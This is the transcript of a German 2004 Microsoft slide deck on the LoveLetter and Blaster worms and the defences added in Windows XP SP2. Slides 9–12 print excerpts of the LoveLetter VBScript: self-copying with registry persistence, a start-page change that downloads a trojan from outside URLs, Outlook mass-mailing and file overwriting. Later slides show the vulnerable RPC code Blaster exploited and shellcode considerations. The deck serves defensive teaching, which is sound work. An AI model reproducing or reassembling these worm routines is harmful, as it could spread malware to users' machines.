Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

Viren, Würmer, SP2 Uwe Baumann Dirk Primbs.NET Community Evangelists Microsoft Deutschland GmbH

Ähnliche Präsentationen


Präsentation zum Thema: "Viren, Würmer, SP2 Uwe Baumann Dirk Primbs.NET Community Evangelists Microsoft Deutschland GmbH"—  Präsentation transkript:

1 Viren, Würmer, SP2 Uwe Baumann Dirk Primbs.NET Community Evangelists Microsoft Deutschland GmbH

2 Sicherheit ist eine der größten und wichtigsten Aufgaben, die unsere Industrie jemals angehen musste. Es geht nicht nur darum, einfach ein paar Sicherheitslöcher zu schließen und weiterzumachen. Die negativen Auswirkungen von Viren und Würmern auf ein akzeptables Niveau herunterzuschrauben erfordert ein fundamental neues Denken über Softwarequalität, ständige Verbesserungen bei Tools und Prozessen, und anhaltende Investitionen in widerstandsfähige neue Sicherheitstechnologien, die bösartigen oder zerstörerischen Code blocken, bevor Schaden entsteht [...] Der technologische Fortschritt in den letzten zwei Jahrzehnten ist unglaublich, und ist viel zu wichtig, als daß wir ein paar Kriminellen erlauben dürfen, uns davon abzuhalten, die fantastischen Errungenschaften der Technologie zu genießen. Bill Gates, 31. März 2004

3 Viren, Würmer, Trojaner Zwei typische Vertreter LoveLetter und Blaster Wurm Inside So funktionieren LoveLetter und Blaster Harte Lektionen Warum konnte das geschehen? Aus Schaden wird man klug Hilfe, mein Code geht nicht mehr! Kann man das auch ausschalten? Zwei typische Vertreter LoveLetter und Blaster Wurm Inside So funktionieren LoveLetter und Blaster Harte Lektionen Warum konnte das geschehen? Aus Schaden wird man klug Hilfe, mein Code geht nicht mehr! Kann man das auch ausschalten?

4 Love Letter Als die Liebe die Welt regierte

5 Vormittag Mitarbeiter des philippinischen Internetproviders Sky Internet bemerken eine drastisch erhöhte Anzahl von Downloads auf ihren Servern. Der Wurm lädt dort einen Trojaner herunter, der Passwörter ausspioniert und an zwei -Adressen versendet. Der Provider schaltet die betroffenen Server ab. Quelle: PCWorld.com Mittwoch, 3. Mai 2000 Ein neuer Wurm taucht auf. Unter den ersten Patienten sind Microsoft Deutschland, Lucent Technology Europa und Credit Suisse 7:00 Uhr Antivirus-Hersteller verschicken die ersten Versionen der Virendefinition an ihre Kunden, aber es ist bereits zu spät denn… Ca. 7:00 Uhr... in Melbourne klickt ein Mitarbeiter des Reiseführer-Verlags Lonely Planet auf das Wurm- Script und verschickt den Wurm an 100 Reiseführer-Autoren in der ganzen Welt… Mittwoch, 4. Mai :00 Uhr Der Wurm trifft im Pentagon und bei der CIA ein. Das FBI nimmt die Ermittlungen auf. 18:40 Uhr Viele Antivirus-Hersteller machen Virus-Definitionsfiles zum freien Download über das Web verfügbar. 16:00 Uhr Der erste Clone taucht auf (Funny Joke) Freitag, 5. Mai Mittlerweile sind 9 weitere Varianten im Umlauf, getarnt als Muttertagsmail und als Nachricht des Antiviren-Herstellers Symantec Dienstag, 9. Mai Virusmeldungen aus aller Welt gehen zurück. Insgesamt sind jetzt 29 Varianten im Umlauf, eine halbe Million PCs wurden infiziert. Ab 7 Uhr … und an der Ostküste der USA klicken Tausende liebeshungrige Büroangestellte nach einem frustrierenden Wochenende auf die Mail in der Hoffnung auf ein Rendez-Vouz Donnerstag, 4. Mai 4:12 Uhr Antivirus-Hersteller in Europa empfangen die ersten Meldungen von Kunden und beginnen um ca. 5:00 Uhr mit der Analyse. Es wird schnell klar: Der Wurm, geschrieben in VB Script, ist nicht sehr kompliziert, aber extrem ansteckend.

6 Reproduktion Verschickt sich als Attachment an - Adressen aus dem Outlook-Addressbuch des Benutzers Verschickt sich über IRC mit Hilfe des DCC Features (Direct Client-to-Client) Verschickt sich als Attachment an - Adressen aus dem Outlook-Addressbuch des Benutzers Verschickt sich über IRC mit Hilfe des DCC Features (Direct Client-to-Client)

7 Aktionen Ersetzt Files mit Kopien des eigenen Codes Startet Download eines Trojaners Verschickt sich selbst über Infiziert (überschreibt) Files Erstellt ein mIRC Script Verändert die Startseite des Internet Explorers Ersetzt Files mit Kopien des eigenen Codes Startet Download eines Trojaners Verschickt sich selbst über Infiziert (überschreibt) Files Erstellt ein mIRC Script Verändert die Startseite des Internet Explorers

8 Inside LoveLetter Analyse des VBS-Skripts

9 Code: Selbstkopien erstellen Set wscr=CreateObject("WScript.Shell") … Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") … regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

10 Code: Trojaner downloaden Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/ […] HJKhjnjbvYT/WINBUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\ Start Page","http://www.skyinet.net/~angelcat/ […]skladjflfd/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~koichi/ […] TRjkcbGRfF/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~chu/ […] sdgfhjjgcb/WIN-BUGSFIX.exe" end if

11 Code: Massenmail schicken set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") set a=mapi.AddressLists(ctrlists) x=1 for ctrentries=1 to a.AddressEntries.Count … set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send … x=x+1 next

12 Code: Files infizieren set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) … elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) … next

13 Das Ende vom Lied 10 Milliarden US$ Schaden (geschätzt) Unzählige Nachahmer Wahrscheinlicher Autor: Philippinischer Student Motiv: Entweder ein Versehen oder die Rache für eine zurückgewiesene Semesterarbeit Verurteilung des Autors nach damals in den Philippinen geltendem Recht nicht möglich 10 Milliarden US$ Schaden (geschätzt) Unzählige Nachahmer Wahrscheinlicher Autor: Philippinischer Student Motiv: Entweder ein Versehen oder die Rache für eine zurückgewiesene Semesterarbeit Verurteilung des Autors nach damals in den Philippinen geltendem Recht nicht möglich

14 Lektionen aus Love Letter Love Letter vertraute darauf, daß… … der Empfänger Mailattachements öffnet wenn die von bekannten Absendern stammt. … der Empfänger ausreichende Rechte hat um von sich selbst Kopien in Systemverzeichnissen zu erstellen.... Mails vollautomatisch verschickt werden können. Love Letter vertraute darauf, daß… … der Empfänger Mailattachements öffnet wenn die von bekannten Absendern stammt. … der Empfänger ausreichende Rechte hat um von sich selbst Kopien in Systemverzeichnissen zu erstellen.... Mails vollautomatisch verschickt werden können.

15 Maßnahmen I Hinweismeldungen von Office- Applikationen, bevor … … VBA-Code ausgeführt wird. … Scripts ausgeführt werden. … Outlook automatisiert werden kann. Hinweismeldungen von Office- Applikationen, bevor … … VBA-Code ausgeführt wird. … Scripts ausgeführt werden. … Outlook automatisiert werden kann.

16 Maßnahmen II Neue Sicherheitsoptionen für die Preview Pane in Outlook Ausführbare Attachements werden blockiert: Mail-Previews laufen in der Restricted Sites Internet Zone Neue Sicherheitsoptionen für die Preview Pane in Outlook Ausführbare Attachements werden blockiert: Mail-Previews laufen in der Restricted Sites Internet Zone

17 Windows XP Service Pack 2 Neue Mail-Preview für Outlook Express Zone Local Machine restriktiver vorkonfiguriert Neue zentrale API zum Handling von Attachements: Attachement Execution Services (AES) Schnittstelle IAttachementExecute Zentralisiert die Risiko-Abschätzung Steuerbar über Group Policies Neue Mail-Preview für Outlook Express Zone Local Machine restriktiver vorkonfiguriert Neue zentrale API zum Handling von Attachements: Attachement Execution Services (AES) Schnittstelle IAttachementExecute Zentralisiert die Risiko-Abschätzung Steuerbar über Group Policies

18 Bitte wenden Sie sich an Ihren Administrator Als Nicht-Administrator wäre es Love Letter nicht möglich gewesen, … … sich in HKLM\…\Run einzutragen. … in ein Systemverzeichnis zu schreiben. … Betriebssystembestandteile auszutauschen. Als Nicht-Administrator wäre es Love Letter nicht möglich gewesen, … … sich in HKLM\…\Run einzutragen. … in ein Systemverzeichnis zu schreiben. … Betriebssystembestandteile auszutauschen.

19 Ein Tag im Leben eines Nicht-Administrators

20 Das Security Problem Software Security Pendel Einfache Benutzung Automagic Alle Features sind ON by default Große Angriffsfläche Out Of The Box Experience Features Attacks Usability&FeaturesSecurity&Privacy Marketing Mode Marketing Mode

21 Das Security Problem Software Security Pendel Geringe connectivity Viele Sicherheitsdialoge Minimierte Angriffsfläche Oft schwerer zu benutzen Nur schwer zu vermarkten Usability&FeaturesSecurity&Privacy Paranoid Mode

22 Das Security Problem Software Security Pendel Kleinere Angriffsfläche Weniger Sicherheits- Dialoge Transparente Einstellung Konfigurierbar Sicher handhabbar! Security & Privacy als Feature für den Anwender Usability&FeaturesSecurity&Privacy Optimum

23 Blaster Mach mal Pause!

24 Reproduktion Wurmcode lädt EXE-Datei MSBLAST.EXE von angreifendem, bereits infizierten System und führt diese lokal aus Die EXE-Datei scannt weitere Systeme und infiziert diese mit dem Wurmcode Wurmcode lädt EXE-Datei MSBLAST.EXE von angreifendem, bereits infizierten System und führt diese lokal aus Die EXE-Datei scannt weitere Systeme und infiziert diese mit dem Wurmcode

25 Aktionen Startet Denial-of-Service Angriff auf Bringt Computer zum Absturz (als Nebeneffekt) Startet Denial-of-Service Angriff auf Bringt Computer zum Absturz (als Nebeneffekt)

26 Inside Blaster Grundlagen: Buffer Overrun Analyse der angreifbaren Stelle im Windows-Sourcecode Grundlagen: Buffer Overrun Analyse der angreifbaren Stelle im Windows-Sourcecode

27 Buffer Overrun: Das Prinzip [1] void main() { char myLongBuffer[256]; myFunction(myBuffer); } void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); } Was passiert, wenn der übergebene String größer als 16 Zeichen ist?

28 Buffer Overrun: Das Prinzip [2] void main() { char myLongBuffer[256]; myFunction(myLongBuffer); } Stack (bisheriger Stackinhalt) 256 MyLongBuffer Rücksprungadresse Sonstige Daten MyShortBuffer 16 Strings void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); } Daten sind zu lang ! MyShortBuffer MyShortBuffer Gehackte Adresse Viruscode Böser Inhalt von MyShortBuffer: Rücksprung an gehackte Adresse… Virus ausführen Stack

29 Code: Blasters Angriffsziel error_status_t _RemoteActivation(WCHAR *pwszObjectName,... ) { *phr = GetServerPath(pwszObjectName, &pwszObjectName); … } HRESULT GetServerPath(WCHAR *pwszPath, WCHAR **pwszServerPath ){ WCHAR * pwszFinalPath = pwszPath; WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]; hr = GetMachineName(pwszPath, wszMachineName); *pwszServerPath = pwszFinalPath; } HRESULT GetMachineName( WCHAR * pwszPath, WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]) { pwszServerName = wszMachineName; LPWSTR pwszTemp = pwszPath + 2; while ( *pwszTemp != L'\\' ) *pwszServerName++ = *pwszTemp++; !!! Port 135 (Z.B. aus dem Internet)

30 Ist das wirklich so einfach? Ausnützen der Sicherheitslöcher ist nicht trivial! Analyse der Verwundbarkeit Sourcecode liegt (oft) nicht vor Virenbaukästen (Kits) helfen beim Bau einfacher Viren und Trojaner, aber… Exploits werden immer schwieriger Extrem detaillierte Kentnisse sind notwendig Unmöglich ohne viel Zeit und Wissen Ausnützen der Sicherheitslöcher ist nicht trivial! Analyse der Verwundbarkeit Sourcecode liegt (oft) nicht vor Virenbaukästen (Kits) helfen beim Bau einfacher Viren und Trojaner, aber… Exploits werden immer schwieriger Extrem detaillierte Kentnisse sind notwendig Unmöglich ohne viel Zeit und Wissen

31 Sorgen eines Hackers Sprungadresse zu eigenem Code finden NOP-Sledge oder gutes Raten DLL-Funktionen aufrufen DLL-Basisadresse? Funktions-Einsprungpunkt? Prozeß abspalten Keine native Win32-Funktion verfügbar Platz für Literale ( z.B. Funktionsnamen) Hashing notwendig Keine Null im Code erlaubt Decoder-Stub nötig Sprungadresse zu eigenem Code finden NOP-Sledge oder gutes Raten DLL-Funktionen aufrufen DLL-Basisadresse? Funktions-Einsprungpunkt? Prozeß abspalten Keine native Win32-Funktion verfügbar Platz für Literale ( z.B. Funktionsnamen) Hashing notwendig Keine Null im Code erlaubt Decoder-Stub nötig Grrr!

32 Das Ende vom Lied 5-10 Millionen US$ Schaden 8 Millionen infizierte Computer Autor immer noch nicht bekannt Einige Nachahmer vor Gericht 5-10 Millionen US$ Schaden 8 Millionen infizierte Computer Autor immer noch nicht bekannt Einige Nachahmer vor Gericht

33 Lektionen aus Blaster Blaster nutzte eine Sicherheitslücke im Betriebssystem aus Aktivierte Firewalls hätten Blaster im Vorfeld verhindert, aber… … schafft es Blaster in ein Unternehmensnetzwerk, helfen nur noch Personal Firewalls auf den einzelnen Systemen Zum Zeitpunkt der Verbreitung von Blaster gab es bereits seit nahezu einem Monat einen Patch, der aber nicht rechtzeitig eingespielt worden war Blaster nutzte eine Sicherheitslücke im Betriebssystem aus Aktivierte Firewalls hätten Blaster im Vorfeld verhindert, aber… … schafft es Blaster in ein Unternehmensnetzwerk, helfen nur noch Personal Firewalls auf den einzelnen Systemen Zum Zeitpunkt der Verbreitung von Blaster gab es bereits seit nahezu einem Monat einen Patch, der aber nicht rechtzeitig eingespielt worden war

34 Maßnahmen gegen BOs Bestimmte C/C++ Kommandos sind besonders anfällig strcpy, gets, scanf, sprintf, strcat, … BOs werden in Managed Code durch Laufzeitchecks verhindert. Compilerswitch /GC aktiviert in Visual C/C++ verbessertes Stackhandling Bestimmte C/C++ Kommandos sind besonders anfällig strcpy, gets, scanf, sprintf, strcat, … BOs werden in Managed Code durch Laufzeitchecks verhindert. Compilerswitch /GC aktiviert in Visual C/C++ verbessertes Stackhandling

35 Nutzloses Wissen Special Quelle: West Virginia Office of Miners Health, Safety and Training Bergarbeiter mit Kanarienvogel (Welsh Miners Canary) Prinzip: Vogel tot = zuviel Methangas

36 Compilerswitch /GC Stack (bisheriger Stackinhalt) 256 MyLongBuffer Rücksprungadresse Security Cookie Strings MyShortBuffer Stack Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen sub esp,20h Epilog: Führt Rücksprung durch add esp,20h ret void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); } Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen und speichert Zufallswert für Security Cookie (Canary) ab sub esp,24h mov eax,dword ptr [___security_cookie (408040h)] xor eax,dword ptr [esp+24h] mov dword ptr [esp+20h],eax Epilog: Prüft den Security Cookie (Canary) und führt anchließend Rücksprung durch mov ecx,dword ptr [esp+20h] xor ecx,dword ptr [esp+24h] add esp,24h jmp __security_check_cookie (4010B2h) MyShortBuffer 16

37 Vertrauen ist gut, Kontrolle ist besser

38 Patchmanagement Definition: Patch Patches beheben gefundene Security Vulnerabilities werden von Microsoft in Sicherheits- Bulletins veröffentlicht (z.B. MS03-47) Patches werden in Rollup-Packages und Service Packs zusammengefasst Vulnerabilities werden von Microsoft in 4 Schweregrade eingeteilt Patches beheben gefundene Security Vulnerabilities werden von Microsoft in Sicherheits- Bulletins veröffentlicht (z.B. MS03-47) Patches werden in Rollup-Packages und Service Packs zusammengefasst Vulnerabilities werden von Microsoft in 4 Schweregrade eingeteilt

39 Patchmanagement Enstehung des Blaster Wurms Schwachstelle entdeckt / Start der Patchentwicklung Bulletin & Patch Verfügbar Bisher kein Angriff Angriffs-Code wird veröffentlicht Wurm infiziert die Welt 1. Juli Juli Juli August 03 Report Schwachstelle in RPC/DDOM aufgedeckt Schwachstelle in RPC/DDOM aufgedeckt MS startet den höchsten Notfall- prozess Level MS startet den höchsten Notfall- prozess LevelBulletin MS wir an Kunden ausgeliefert MS wir an Kunden ausgeliefert Kontinuierliche Kommunikation mit Analysten, Presse, Community, Partner, Regierungsbehörden Kontinuierliche Kommunikation mit Analysten, Presse, Community, Partner, RegierungsbehördenExploit X-focus (Chinesische Security-Spezialisten) veröffentlicht Angriffs- Tool X-focus (Chinesische Security-Spezialisten) veröffentlicht Angriffs- Tool MS maximiert die Anstrengungen, alle Kunden zu informieren MS maximiert die Anstrengungen, alle Kunden zu informierenWorm Blaster Wurm entdeckt Blaster Wurm entdeckt Varianten und andere Viren schlagen gemeinsam zu (z.B. SoBig) Varianten und andere Viren schlagen gemeinsam zu (z.B. SoBig) Blaster zeigt das komplexe Zusammenspiel zwischen Sicherheitsforschung, Softwarehersteller und Hackern

40 Patchmanagement Reaktionszeit Zeitspanne zwischen erscheinen des Patches und Auftreten eines Exploits sinkt Exploits werden intelligenter Ansatz Patch Management reicht nicht Neue Techniken müssen entwickelt werden Zeitspanne zwischen erscheinen des Patches und Auftreten eines Exploits sinkt Exploits werden intelligenter Ansatz Patch Management reicht nicht Neue Techniken müssen entwickelt werden Blaster Welchia/ Nachi Nimda 25 SQL Slammer Tage zwischen Patch und Angriff

41 Windows XP SP2 Verbessertes Patchmanagement Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools hot patching Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot Verbessertes Patchmanagement Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools hot patching Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot

42 Windows XP SP2 Execution Protection (no-execute, NX) Speicher wird als Datenspeicher markiert Der Versuch, im NX-Bereich Code auszuführen führt zu einer Exception Muß von Hardware unterstützt werden Execution Protection (no-execute, NX) Speicher wird als Datenspeicher markiert Der Versuch, im NX-Bereich Code auszuführen führt zu einer Exception Muß von Hardware unterstützt werden

43 Internet Connection Firewall Ab SP2 ist die ICF ON by default Boot time protection Verbesserte Konfigurationsmöglichkeiten Group Policy, Kommandozeile Verbesserte Benutzeroberfläche Programmatisch: INetFwV4AuthorizedApplication, INetFwV4AuthorizedApplications, INetFwV4Mgr, INetFwV4Policy, INetFwV4Profile Ab SP2 ist die ICF ON by default Boot time protection Verbesserte Konfigurationsmöglichkeiten Group Policy, Kommandozeile Verbesserte Benutzeroberfläche Programmatisch: INetFwV4AuthorizedApplication, INetFwV4AuthorizedApplications, INetFwV4Mgr, INetFwV4Policy, INetFwV4Profile

44 Internet Connection Firewall II Drei Betriebsmodi Aktiviert (Standard) Alle eingehende Verbindungen werden blockiert, Ausnahme: Für in einer White List erfasste Programme werden Ports bei Bedarf geöffnet Aktiviert - keine Ausnahmen Shielded Mode, es werden keine eingehenden Verbindungen zugelassen Deaktiviert Drei Betriebsmodi Aktiviert (Standard) Alle eingehende Verbindungen werden blockiert, Ausnahme: Für in einer White List erfasste Programme werden Ports bei Bedarf geöffnet Aktiviert - keine Ausnahmen Shielded Mode, es werden keine eingehenden Verbindungen zugelassen Deaktiviert

45 Windows XP SP2 – Weitere Änderungen Unterbindung von anonymen RPC-Aufrufen Neuer Registry-Key steuert das Verhalten: \\HKLM\SOFTWARE\Policies\Microsoft\Windows NT\RPC\ RestrictRemoteClients RPC_RESTRICT_REMOTE_CLIENT_NONE (0) – bisheriges Verhalten RPC_RESTRICT_REMOTE_CLIENT_DEFAULT (1) – Anonyme Zugriffe werden zurückgewiesen. Standarteinstellung RPC_RESTRICT_REMOTE_CLIENT_HIGH (2) – genauso wie zuvor, mit der Ausnahme, daß das RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag keine Wirkung mehr hat. DCOM: Globale Konfiguration von Zugriffsrechten Die meisten lokalen Szenarien funktionieren ohne Änderung Remote: Nur Administratoren haben by default das Recht Applikationen zu aktivieren (Activation) und zu starten (Launch) Unterbindung von anonymen RPC-Aufrufen Neuer Registry-Key steuert das Verhalten: \\HKLM\SOFTWARE\Policies\Microsoft\Windows NT\RPC\ RestrictRemoteClients RPC_RESTRICT_REMOTE_CLIENT_NONE (0) – bisheriges Verhalten RPC_RESTRICT_REMOTE_CLIENT_DEFAULT (1) – Anonyme Zugriffe werden zurückgewiesen. Standarteinstellung RPC_RESTRICT_REMOTE_CLIENT_HIGH (2) – genauso wie zuvor, mit der Ausnahme, daß das RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag keine Wirkung mehr hat. DCOM: Globale Konfiguration von Zugriffsrechten Die meisten lokalen Szenarien funktionieren ohne Änderung Remote: Nur Administratoren haben by default das Recht Applikationen zu aktivieren (Activation) und zu starten (Launch)

46 Was tun, wenn nichts mehr geht? Security is designed to make your system not work (Michael Howard)

47 Fazit Viele Viren benutzen einfache Mechanismen um sich zu Systemen Zugang zu verschaffen Durch gezielte Maßnahmen kann die Anfälligkeit einer Applikation bzw. eines Systems deutlich gesenkt werden Viele Viren benutzen einfache Mechanismen um sich zu Systemen Zugang zu verschaffen Durch gezielte Maßnahmen kann die Anfälligkeit einer Applikation bzw. eines Systems deutlich gesenkt werden

48 © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

49 Referenzen Marshall Brain: How Stuff Works: Computer Viruses Ulf Larson: VBS.LoveLetter: A Study of the LoveLetter worm D/EDA261/03/oh03/oh_F05_loveletter_4pp. pdf D/EDA261/03/oh03/oh_F05_loveletter_4pp. pdf Marshall Brain: How Stuff Works: Computer Viruses Ulf Larson: VBS.LoveLetter: A Study of the LoveLetter worm D/EDA261/03/oh03/oh_F05_loveletter_4pp. pdf D/EDA261/03/oh03/oh_F05_loveletter_4pp. pdf

50 Referenzen Slipstick Systems : Protecting Microsoft Outlook against Viruses htm htm Bill Gates: Microsoft Progress Report: Security l/2004/03-31security-print.asp l/2004/03-31security-print.asp Slipstick Systems : Protecting Microsoft Outlook against Viruses htm htm Bill Gates: Microsoft Progress Report: Security l/2004/03-31security-print.asp l/2004/03-31security-print.asp

51 Referenzen PC World: "When Love Came to Town: A Virus Investigation XP Service Pack 2 for Developers tinfo/xpsp2/default.aspx tinfo/xpsp2/default.aspx PC World: "When Love Came to Town: A Virus Investigation XP Service Pack 2 for Developers tinfo/xpsp2/default.aspx tinfo/xpsp2/default.aspx

52 Referenzen Microsoft Developer Security Center Microsoft Security Center Compiler Security Checks in Depth us/dv_vstechart/html/vctchcompilersecurity checksindepth.asp us/dv_vstechart/html/vctchcompilersecurity checksindepth.asp Microsoft Developer Security Center Microsoft Security Center Compiler Security Checks in Depth us/dv_vstechart/html/vctchcompilersecurity checksindepth.asp us/dv_vstechart/html/vctchcompilersecurity checksindepth.asp

53 Referenzen Microsoft Baseline Security Analyzer /tools/mbsahome.mspx /tools/mbsahome.mspx Microsoft Compatibility Toolkit (Application Verifier) ils.aspx?FamilyID=7fc46855-b8a4-46cd- a fde94&displaylang=en ils.aspx?FamilyID=7fc46855-b8a4-46cd- a fde94&displaylang=en fxCop Microsoft Baseline Security Analyzer /tools/mbsahome.mspx /tools/mbsahome.mspx Microsoft Compatibility Toolkit (Application Verifier) ils.aspx?FamilyID=7fc46855-b8a4-46cd- a fde94&displaylang=en ils.aspx?FamilyID=7fc46855-b8a4-46cd- a fde94&displaylang=en fxCop

54 Referenzen Developing Software with Non- Administrative privileges us/dv_vstechart/html/tchdevelopingsoftwar einvisualstudionetwithnon- administrativeprivileges.asp us/dv_vstechart/html/tchdevelopingsoftwar einvisualstudionetwithnon- administrativeprivileges.asp West Virginia Office for Mine Safety: Historic Photos ml ml Developing Software with Non- Administrative privileges us/dv_vstechart/html/tchdevelopingsoftwar einvisualstudionetwithnon- administrativeprivileges.asp us/dv_vstechart/html/tchdevelopingsoftwar einvisualstudionetwithnon- administrativeprivileges.asp West Virginia Office for Mine Safety: Historic Photos ml ml

55 Windows XP SP2 Firewalling ICF ON by default in allen Konfigurationen LAN, Dial-Up, 3rd Party Tools (T-Online) Mehr Konfigurationsmöglichkeiten Group policy, command line, unattended setup Besseres User Interface Boot time protection Unterstützung mehrerer Profile Firmennetz vs. Heimnetzwerk ICF ON by default in allen Konfigurationen LAN, Dial-Up, 3rd Party Tools (T-Online) Mehr Konfigurationsmöglichkeiten Group policy, command line, unattended setup Besseres User Interface Boot time protection Unterstützung mehrerer Profile Firmennetz vs. Heimnetzwerk

56 Windows XP SP2 -Sicherheit API für sicheres Handling von Attachments (Attachment Execution Services) Default: Do not trust unsafe attachments! Outlook, Outlook Express, Windows Messenger, Internet Explorer verwenden diese neue API Öffnen und Ausführen von Attachments mit so wenig Privilegien wie möglich Sicheres Message Preview API für sicheres Handling von Attachments (Attachment Execution Services) Default: Do not trust unsafe attachments! Outlook, Outlook Express, Windows Messenger, Internet Explorer verwenden diese neue API Öffnen und Ausführen von Attachments mit so wenig Privilegien wie möglich Sicheres Message Preview

57 Windows XP SP2 Internet Explorer Immer Benachrichtigungen bei installierenden und ausgeführten ActiveX Controls HTML Dateien auf der lokalen Maschine sind nicht in der Lage: unsichere ActiveX Controls auszuführen auf Daten in der Local Machine Zone zuzugreifen Unbekannten und unsignierte ActiveX Controls werden geblockt Immer Benachrichtigungen bei installierenden und ausgeführten ActiveX Controls HTML Dateien auf der lokalen Maschine sind nicht in der Lage: unsichere ActiveX Controls auszuführen auf Daten in der Local Machine Zone zuzugreifen Unbekannten und unsignierte ActiveX Controls werden geblockt

58 Windows XP SP2 Internet Explorer Verbessert Behandlung von geladenen Dateien durch besseres MIME-Handling nicht passende oder fehlende MIME-Header und Dateierweiterungen werden geblockt Automatisches Öffnen von Pop-up Fenstern wird verhindert es sein denn, der Benutzer stimmt ihnen zu Verringertes UI-Spoofing Verbessert Behandlung von geladenen Dateien durch besseres MIME-Handling nicht passende oder fehlende MIME-Header und Dateierweiterungen werden geblockt Automatisches Öffnen von Pop-up Fenstern wird verhindert es sein denn, der Benutzer stimmt ihnen zu Verringertes UI-Spoofing

59 Windows XP SP2 Update-Prozess Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools hot patching Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools hot patching Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot

60 Improved Security Attachment Execution Services (AES) What? OS service that protects the system from malicious attachments and prompts in low-risk scenarios Unified approach to be used by Outlook, OE, and Windows Messenger Why? Too many trust decisions being made by users Impossible to make a complete list of malicious file types Each app handles attachments differently Why should I care? If you develop an app that executes or saves attachments your app may break Attachment Execution Services (AES) What? OS service that protects the system from malicious attachments and prompts in low-risk scenarios Unified approach to be used by Outlook, OE, and Windows Messenger Why? Too many trust decisions being made by users Impossible to make a complete list of malicious file types Each app handles attachments differently Why should I care? If you develop an app that executes or saves attachments your app may break

61 Attachment Execution Services Gives each attachment a risk rating Based on extension, content-type, registered handlers, etc. Risk rating is mapped to a policy associated with IE Zones Developers should use the IAttachmentExecute COM interface as the entry point Replaces calls to AssocIsDangerous and custom UIs in the simplest case Gives each attachment a risk rating Based on extension, content-type, registered handlers, etc. Risk rating is mapped to a policy associated with IE Zones Developers should use the IAttachmentExecute COM interface as the entry point Replaces calls to AssocIsDangerous and custom UIs in the simplest case

62 Attachment Execution Services Default Zone Policy RestrictedInternet Intrane tLocalTrusted High RiskBlockPromptAllow Med. RiskPrompt Allow Low RiskAllow

63 Attachment Execution Services CheckPolicy()Replaces client interpretation of AssocIsDangerous() and custom policy/configuration. Examines available evidence and checks the resulting policy PromptUser()Replaces custom prompts for user trust. Can be called by the application to force user interface (UI) at an earlier point, even before the file is copied to disk ExecuteReplaces call to ShellExecute(). Ensures CheckPolicy() and PromptUser() are called as needed. Calls the IAttachmentExecute::PromptUser() with an EXEC action Save()Ensures CheckPolicy () is called as needed. Saves evidence to the attachment IAttachmentExecute Interface


Herunterladen ppt "Viren, Würmer, SP2 Uwe Baumann Dirk Primbs.NET Community Evangelists Microsoft Deutschland GmbH"

Ähnliche Präsentationen


Google-Anzeigen